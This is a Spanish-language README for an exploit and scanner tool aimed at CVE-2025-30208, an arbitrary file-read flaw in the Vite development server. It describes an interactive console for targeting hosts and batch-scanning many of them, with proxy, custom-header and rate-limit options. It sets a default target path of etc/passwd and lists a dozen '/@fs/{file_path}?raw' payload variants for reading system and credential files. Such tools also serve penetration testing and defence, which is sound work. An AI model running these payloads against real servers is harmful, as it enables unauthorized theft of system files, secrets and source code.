
CVE‑2025‑30208 es una vulnerabilidad de lectura arbitraria de archivos de severidad media en el servidor de desarrollo de Vite (una popular herramienta de compilación frontend)
Escáner de vulnerabilidades avanzado para CVE-2025-30208 con funciones de nivel empresarial
Herramienta profesional de pruebas de penetración para la detección de la vulnerabilidad de lectura arbitraria de archivos en Vite
🚀 Inicio Rápido • 📋 Características • 🔧 Uso • 📊 Ejemplos • 🛡️ Seguridad
Este es un escáner de vulnerabilidades integral diseñado para detectar y explotar la vulnerabilidad CVE-2025-30208 en los servidores de desarrollo de Vite. La vulnerabilidad permite el acceso de lectura arbitraria de archivos a través de los endpoints del sistema de archivos de Vite, lo que potencialmente expone archivos de configuración sensibles, código fuente e información del sistema.
La herramienta ahora cuenta con una arquitectura modular para una mejor mantenibilidad y extensibilidad:
CVE-2025-30208.py - Aplicación principal del escánerpayloads.py - Payloads de explotación avanzados (más de 60 variaciones)sensitive_files.py - Base de datos integral de archivos sensibles (más de 200 archivos)html_template.py - Plantilla de informes HTML mejorada con estilo hackerpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
CVE-2025-30208 > scan
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
| Comando | Descripción | Ejemplo |
|---|---|---|
set <option> <value> | Establecer opciones de configuración | set RHOST 192.168.1.100 |
show options | Mostrar la configuración actual | show options |
edit | Editor interactivo de opciones | edit |
run / exploit | Ejecutar la prueba de vulnerabilidad | run |
batch | Escaneo por lotes de múltiples objetivos | batch |
scan | Descubrir archivos sensibles | scan |
pull | Exportar resultados a HTML/JSON | pull |
web [on|off|port] | Servidor web para informes HTML | web 8080 |
save | Guardar la configuración de la sesión | save |
load | Cargar la configuración de la sesión | load |
test | Probar la conectividad con el objetivo | test |
validate | Validar la configuración actual | validate |
verbose | Alternar el modo verbose | verbose |
proxy | Configurar los ajustes de proxy | proxy |
headers | Establecer cabeceras HTTP personalizadas | headers |
rate | Configurar el límite de velocidad | rate |
log | Mostrar información de registro | log |
help / ? | Mostrar ayuda | help |
exit / quit | Salir de la herramienta | exit |
| Opción | Descripción | Valor por defecto | Validación |
|---|---|---|---|
RHOST | Dirección IP/host del objetivo | - | Validación de hostname/IP |
RPORT | Número de puerto del objetivo | - | Rango de puertos (1-65535) |
FILEPATH | Ruta de archivo a probar | etc/passwd | Validación de ruta |
PROXY | URL de proxy HTTP/HTTPS | - | Validación de formato URL |
VERBOSE | Habilitar salida detallada | false | Validación booleana |
RATE_LIMIT | Retardo entre peticiones (segundos) | 0.3 | Validación numérica |
THREADS | Número de hilos para el escaneo por lotes | 5 | Validación de entero |
TIMEOUT | Tiempo de espera de petición (segundos) | 5 | Validación de entero |
CUSTOM_HEADERS | Cabeceras HTTP personalizadas (JSON) | {} | Validación de formato JSON |
El escáner ahora utiliza más de 60 variaciones de payload organizadas en payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8